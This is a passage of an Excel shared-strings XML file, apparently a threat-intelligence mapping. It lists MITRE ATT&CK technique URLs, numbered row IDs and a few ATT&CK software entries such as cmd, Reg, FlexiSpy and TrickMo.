    <t>https://attack.mitre.org/techniques/T1204/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1125</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1220</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1435</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1433</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1432</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1517</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1413</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1409</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1438</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1418</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1427</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1402</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1616</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1429</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1512</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1414</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1412</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1448</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1510</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1540</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1605</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1436</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1577</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1532</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1471</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1533</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1447</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1475</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1476</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1401</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1446</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1408</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1520</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1466</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1407</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1456</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1439</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1523</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1428</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1404</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1449</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1450</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1405</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1458</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1477</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1420</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1541</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1472</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1581</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1617</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1417</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1516</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1411</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1478</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1464</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1579</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1430</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1461</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1452</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1463</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1444</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1403</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1398</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1400</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1399</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1575</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1507</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1423</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1410</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1406</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1470</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1424</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1604</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1544</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1468</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1469</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1467</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1465</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1603</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1513</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1451</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1582</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1437</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1521</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1474</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1508</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1426</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1422</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1421</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1509</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1576</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1416</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1618</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1481</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>builtin</t>
  </si>
  <si>
    <t>S0702</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0042</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0043</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0044</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0045</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0046</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0047</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0049</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0050</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0051</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0052</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0053</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0054</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0055</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0056</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0057</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0058</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0059</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0061</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0062</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0063</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0064</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0065</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0066</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0067</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0068</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0069</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0071</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0072</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0073</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0074</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0075</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0076</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0077</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0078</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0079</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0080</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0081</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0082</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0083</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0084</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0085</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0086</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0087</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0088</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0089</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0090</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0091</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0093</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0094</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0095</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0096</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0097</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0098</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0099</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0100</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0101</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0102</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0103</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0104</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0106</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0108</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0109</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0110</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0111</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0112</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0113</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0114</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0115</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0116</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0117</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0118</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0119</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0121</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0122</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0123</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0126</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0127</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0128</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0129</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0130</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0131</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0132</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0133</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0134</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0135</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0136</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0137</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0138</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0139</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0140</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0141</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0143</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0144</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0145</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0146</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0147</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0148</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1110</t>
  </si>
  <si>
    <t>R0149</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0150</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0151</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0152</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0153</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0154</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0155</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0156</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0157</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0158</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0159</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0160</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0161</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0162</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0164</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0165</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0166</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmd</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows, Linux, macOS</t>
  </si>
  <si>
    <t>S0408</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FlexiSpy</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S0485</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mandrake</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S00039</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Net</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S0075</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Reg</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S0427</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TrickMo</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0168</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0171</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0172</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0173</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0174</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0175</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0176</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0177</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0178</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0179</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0180</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0181</t>
  </si>
  <si>
    <t>R0182</t>
  </si>
  <si>
    <t>R0184</t>
  </si>
  <si>
    <t>R0185</t>
  </si>
  <si>
    <t>R0186</t>
  </si>
  <si>
    <t>R0187</t>
  </si>
  <si>
    <t>R0188</t>
  </si>
  <si>
    <t>R0189</t>
  </si>
  <si>
    <t>R0190</t>
  </si>
  <si>
    <t>R0191</t>
  </si>
  <si>
    <t>R0192</t>
  </si>
  <si>
    <t>R0193</t>
  </si>
  <si>
    <t>R0194</t>
  </si>
  <si>
    <t>R0195</t>
  </si>
  <si>
    <t>R0196</t>
  </si>
  <si>
    <t>R0197</t>
  </si>
  <si>
    <t>R0199</t>
  </si>
  <si>
    <t>R0200</t>
  </si>
  <si>
    <t>R0201</t>
  </si>
  <si>
    <t>R0202</t>
  </si>
  <si>
    <t>R0203</t>
  </si>
  <si>
    <t>R0204</t>
  </si>
  <si>
    <t>R0205</t>
  </si>
  <si>
    <t>R0206</t>
  </si>
  <si>
    <t>R0207</t>
  </si>
  <si>
    <t>R0208</t>
  </si>
  <si>
    <t>R0209</t>
  </si>
  <si>
    <t>R0210</t>
  </si>
  <si>
    <t>R0211</t>
  </si>
  <si>
    <t>R0212</t>
  </si>
  <si>
    <t>R0213</t>
  </si>
  <si>
    <t>R0214</t>
  </si>
  <si>
    <t>R0215</t>
  </si>
  <si>
    <t>R0217</t>
  </si>
  <si>
    <t>R0218</t>
  </si>
  <si>
    <t>R0220</t>
  </si>
  <si>
    <t>R0222</t>
  </si>
  <si>
    <t>R0223</t>
  </si>
  <si>
    <t>R0224</t>
  </si>
  <si>
    <t>R0225</t>
  </si>
  <si>
    <t>R0226</t>
  </si>
  <si>
    <t>R0227</t>
  </si>
  <si>
    <t>R0228</t>
  </si>
  <si>
    <t>R0229</t>
  </si>
  <si>
    <t>R0230</t>
  </si>
  <si>
    <t>R0231</t>
  </si>
  <si>
    <t>R0232</t>
  </si>
  <si>
    <t>R0233</t>
  </si>
  <si>
    <t>R0234</t>
  </si>
  <si>
    <t>R0237</t>
  </si>
  <si>
    <t>R0238</t>
  </si>
  <si>
    <t>R0239</t>
  </si>
  <si>
    <t>R0241</t>
  </si>
  <si>
    <t>R0242</t>
  </si>
  <si>
    <t>R0246</t>
  </si>
  <si>
    <t>R0248</t>
  </si>
  <si>
    <t>R0249</t>
  </si>
  <si>
    <t>R0250</t>
  </si>
  <si>
    <t>R0252</t>
  </si>
  <si>
    <t>R0253</t>
  </si>
  <si>
    <t>R0254</t>
  </si>
  <si>
    <t>R0255</t>
  </si>
  <si>
    <t>R0256</t>
  </si>
  <si>
    <t>R0257</t>
  </si>
  <si>
    <t>R0260</t>
  </si>
  <si>
    <t>R0261</t>
  </si>
  <si>
    <t>R0262</t>
  </si>
  <si>
    <t>R0263</t>
  </si>
  <si>
    <t>R0264</t>
  </si>
  <si>
    <t>R0265</t>
  </si>
  <si>
    <t>R0266</t>
  </si>
  <si>
    <t>R0267</t>
  </si>
  <si>
    <t>R0268</t>
  </si>
  <si>
    <t>R0269</t>
  </si>
  <si>
    <t>R0271</t>
  </si>
  <si>
    <t>R0272</t>
  </si>
  <si>
    <t>R0277</t>
  </si>
  <si>
    <t>R0278</t>
  </si>
  <si>
    <t>R0279</t>
  </si>
  <si>
    <t>R0281</t>
  </si>
  <si>
    <t>R0282</t>
  </si>
  <si>
    <t>R0283</t>
  </si>
  <si>
    <t>R0284</t>
  </si>
  <si>
    <t>R0285</t>
  </si>
  <si>
    <t>R0286</t>
  </si>
  <si>
    <t>R0287</t>
  </si>
  <si>
    <t>R0288</t>
  </si>
  <si>
    <t>R0289</t>
  </si>
  <si>
    <t>R0291</t>
  </si>
  <si>
    <t>R0292</t>
  </si>
